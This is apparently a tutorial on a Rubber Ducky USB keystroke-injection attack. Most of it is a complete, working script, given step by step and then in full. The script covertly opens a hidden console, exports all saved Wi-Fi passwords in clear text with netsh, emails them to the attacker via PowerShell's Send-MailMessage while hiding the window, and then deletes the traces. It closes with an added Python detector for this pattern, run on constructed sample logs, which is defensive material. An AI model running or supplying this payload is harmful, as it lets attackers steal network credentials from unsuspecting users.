Imagine you plug a USB stick into your PC and within a few seconds you get an email containing all passwords. That sounds very complicated, but it really is not.
What is a Rubber Ducky?
You can think of it as a keyboard in the form of a USB stick. The Rubber Ducky executes whatever you give it as a command: for example, it opens programs or enters commands in CMD or PowerShell. It can do everything you can do with a keyboard. At the heart of the stick is a microSD card, on which you can store any key sequences, which are then played back when the stick is plugged in.
How do I proceed to read out all WLAN passwords?
It is important to know that this is a ready-to-use script, so you can try it without a Rubber Ducky. Just leave out STRING, DELAY, ENTER and so on and enter it into your CMD.
Getting started is very simple: you open a CMD with the Rubber Ducky. It is also desirable to return to the desktop first, so that no other programs are open. It would also be good to make the attack invisible, so that the user who inserts the USB stick cannot see which commands are executed.
DELAY 3000
WINDOWS d
DELAY 100
WINDOWS r
DELAY 200
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
ENTER
- After that we change to the desktop, so that everything we do is saved there, using this command:
STRING cd "%USERPROFILE%\Desktop"
ENTER
- There we create the folder WiFi_Passwords:
STRING md WiFi_Passwords
ENTER
- After that we export all profiles with passwords of all WLANs to this folder:
STRING netsh wlan export profile folder="%USERPROFILE%\Desktop"\WiFi_Passwords\ key=clear
ENTER
- After all profiles have been saved, we send everything to ourselves via email. But these commands only work in PowerShell, so we open it and minimize this window so that nobody can see what was entered:
STRING powershell
ENTER
DELAY 200
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER
- Now we come to one of the most difficult points: sending the email with the content of the Wi-Fi passwords:
STRING Send-MailMessage -To "Empfänger@gmail.com" -Subject "WLAN Passwort" -Body (Get-Content WiFi_Passwords\*.xml | out-string) -SmtpServer "SMTP-Server" -From "Sender@gmail.com"
ENTER
DELAY 700
- Here, just replace the recipient address, the sender address and the SMTP server placeholders with your own values.
I recommend always using small delays so as not to overload the PC.
Last but not least, I would delete the folder and all the files it contains:
STRING del WiFi_Passwords
ENTER
STRING J
ENTER
STRING rd WiFi_Passwords & exit
ENTER
- Finally, here is the finished script:
DELAY 3000
WINDOWS d
DELAY 100
WINDOWS r
DELAY 200
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
ENTER
DELAY 100
STRING cd "%USERPROFILE%\Desktop"
ENTER
STRING md WiFi_Passwords
ENTER
STRING netsh wlan export profile folder="%USERPROFILE%\Desktop"\WiFi_Passwords\ key=clear
ENTER
DELAY 200
STRING powershell
ENTER
DELAY 200
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER
STRING Send-MailMessage -To "Empfänger@gmail.com" -Subject "WLAN Passwort" -Body (Get-Content WiFi_Passwords\*.xml | out-string) -SmtpServer "SMTP-Server " -From "Sender@gmail.com"
ENTER
DELAY 700
STRING exit
ENTER
DELAY 100
STRING del WiFi_Passwords
ENTER
STRING J
ENTER
STRING rd WiFi_Passwords & exit
ENTER
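Seen from the defender's side, the steps above leave two traces on the host: a netsh process started with key=clear, and a Send-MailMessage call in PowerShell shortly afterwards. The following Python code is an added example, not part of the original script; the event tuples are constructed, simplified stand-ins for process-creation and PowerShell script-block logs, and the two-minute correlation window is an assumption.

```python
import re
from datetime import datetime, timedelta

# Constructed, simplified records: "proc" stands in for process-creation
# logging, "ps" for PowerShell script-block logging. Not a real log schema.
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:03", "PC-01", "proc", 'cmd /Q /D /T:7F /F:OFF /V:ON /K'),
    ("2024-05-01T10:00:04", "PC-01", "proc", 'netsh wlan export profile folder="C:\\Users\\a\\Desktop"\\WiFi_Passwords\\ key=clear'),
    ("2024-05-01T10:00:05", "PC-01", "ps", '[console]::WindowHeight=1'),
    ("2024-05-01T10:00:06", "PC-01", "ps", 'Send-MailMessage -To "x@example.com" -Body (Get-Content WiFi_Passwords\\*.xml | out-string) -SmtpServer "smtp.example.com"'),
    ("2024-05-01T11:30:00", "PC-02", "proc", 'netsh wlan show profiles'),
    ("2024-05-01T12:00:00", "PC-03", "ps", 'Send-MailMessage -To "ops@example.com" -Subject "Backup report"'),
]

EXPORT_RE = re.compile(r"netsh(\.exe)?\s+wlan\s+export\s+profile\b.*\bkey\s*=\s*clear", re.I)
MAIL_RE = re.compile(r"\bSend-MailMessage\b", re.I)
WINDOW = timedelta(minutes=2)  # assumed correlation window


def detect(events):
    """Return (host, severity, reason) alerts.

    medium: Wi-Fi profiles exported with clear-text keys.
    high:   same host sends mail from PowerShell within WINDOW afterwards.
    """
    alerts = []
    last_export = {}  # host -> time of most recent clear-text export
    for ts, host, kind, text in sorted(events):
        when = datetime.fromisoformat(ts)
        if kind == "proc" and EXPORT_RE.search(text):
            last_export[host] = when
            alerts.append((host, "medium", "wlan profile export with key=clear"))
        elif kind == "ps" and MAIL_RE.search(text):
            exported = last_export.get(host)
            if exported is not None and when - exported <= WINDOW:
                alerts.append((host, "high", "Send-MailMessage after key=clear export"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The listing of profiles on PC-02 and the unrelated mail on PC-03 raise no alert; only the export with clear-text keys, and the mail that follows it on the same host, are flagged.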